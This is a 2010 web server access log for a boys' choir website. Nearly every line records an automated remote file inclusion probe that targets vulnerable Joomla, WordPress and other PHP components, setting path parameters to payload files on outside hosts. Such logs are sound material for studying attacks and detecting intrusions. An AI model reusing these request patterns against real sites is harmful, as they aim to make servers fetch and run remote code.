124.49.100.254 - - [09/Mar/2010:06:52:43 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:06:52:51 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:06:52:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:06:52:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:06:52:55 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.17.171.225 - - [09/Mar/2010:06:53:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Plukkie/1.3; http://www.botje.com/plukkie.htm)" "www.americanboyschoir.com"
85.17.171.225 - - [09/Mar/2010:06:53:58 -0800] "GET /xxx/?M=A HTTP/1.1" 200 662 "-" "Mozilla/5.0 (compatible; Plukkie/1.3; http://www.botje.com/plukkie.htm)" "www.americanboyschoir.com"
87.250.255.243 - - [09/Mar/2010:06:55:37 -0800] "GET /logs/access_100214.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:16 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:16 -0800] "GET /logs/access_091213.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:16 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:19 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:19 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:19 -0800] "GET /logs/access_091213.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:06:57:35 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:06:57:35 -0800] "GET /logs/access_091029.log%20%20//twindow_notice.php?shop_this_skin_path=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:06:57:35 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:36 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:57:39 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:06:57:39 -0800] "GET /logs/access_100116.log%20%20//twindow_notice.php?shop_this_skin_path=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:27 -0800] "GET /logs//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:27 -0800] "GET /logs/access_091229.log%20%20//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:27 -0800] "GET /skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:28 -0800] "GET /skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:28 -0800] "GET /logs//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:28 -0800] "GET /logs/access_091229.log%20%20//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:29 -0800] "GET /logs/access_091111.log%20%20//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:06:58:31 -0800] "GET /logs/access_091111.log%20%20//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:58:34 -0800] "GET /logs/access_091229.log%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:06:58:59 -0800] "GET /logs/access_091229.log%20%20//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:00:19 -0800] "GET /logs//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:00:19 -0800] "GET /ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:00:19 -0800] "GET /logs/access_100126.log//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:00:34 -0800] "GET /logs/access_100112.log//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:03:08 -0800] "GET /logs/access_100112.log%20%20//include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:03:08 -0800] "GET /include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:03:08 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:04:37 -0800] "GET /include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:04:37 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:04:37 -0800] "GET /logs/access_100112.log%20%20//include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:04:54 -0800] "GET /ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:04:54 -0800] "GET /logs//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:04:54 -0800] "GET /logs/access.log//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.18.192.91 - - [09/Mar/2010:07:05:24 -0800] "GET /logs/access_100126.log//ting_music//write.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:05:26 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:05:31 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:05:31 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:06:13 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:06:22 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:06:23 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:06:53 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:07:07:10 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:07:07:10 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:07:07:10 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:07:07:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:07:07:42 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:07:07:42 -0800] "GET /logs/access_091111.log//modules/vwar/admin/admin.php?vwar_root=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:07:48 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:07:49 -0800] "GET /logs/access_100117.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:08:08 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:08:08 -0800] "GET /logs/access_100117.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:07:08:12 -0800] "GET /logs/access_100209.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.226.75.106 - - [09/Mar/2010:07:09:26 -0800] "GET /logs/access_100130.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.172.33.230 - - [09/Mar/2010:07:13:03 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.americanboyschoir.com"
209.172.33.230 - - [09/Mar/2010:07:13:03 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.americanboyschoir.com"
209.172.33.230 - - [09/Mar/2010:07:13:03 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:07:13:31 -0800] "GET /logs/access_100112.log//include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:13:58 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:13:58 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:13:58 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:14:33 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:14:33 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:14:33 -0800] "GET /logs/access_100131.log%20%20/modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:15:12 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:15:35 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:15:35 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:15:38 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:16:04 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:16:04 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:07:16:05 -0800] "GET /logs/access_100131.log%20%20/modules/TotalCalendar/about.php?inc_dir=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:16:17 -0800] "GET /logs/access_091229.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:07:16:42 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:07:16:42 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.130.32.85 - - [09/Mar/2010:07:16:43 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:07:16:57 -0800] "GET /logs/access_100112.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:07:17:18 -0800] "GET /logs/access_100112.log//include/admin.lib.inc.php?site_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:07:17:47 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:07:17:47 -0800] "GET /components/com_fabrik/libs/Blowfish/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:07:17:47 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:18:13 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:18:13 -0800] "GET /logs/access_100117.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:18:13 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:18:47 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:18:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:18:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:07:18:49 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:07:18:49 -0800] "GET /logs/access_100117.log///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:07:18:49 -0800] "GET //vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:07:19:12 -0800] "GET /logs/access_091229.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.224.132.89 - - [09/Mar/2010:07:19:44 -0800] "GET /logs/access_100228.log//components/com_fabrik/libs/Blowfish/errors.php?error=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:19:49 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:19:49 -0800] "GET /logs/access_100117.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:19:52 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:20:01 -0800] "GET /logs/access_091229.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:07:20:09 -0800] "GET //vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:07:20:09 -0800] "GET /logs/access_100117.log///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:07:20:09 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.237.78.123 - - [09/Mar/2010:07:20:39 -0800] "GET /logs/access_100112.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:07:21:45 -0800] "GET /logs/access_091229.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.40.122.117 - - [09/Mar/2010:07:21:53 -0800] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
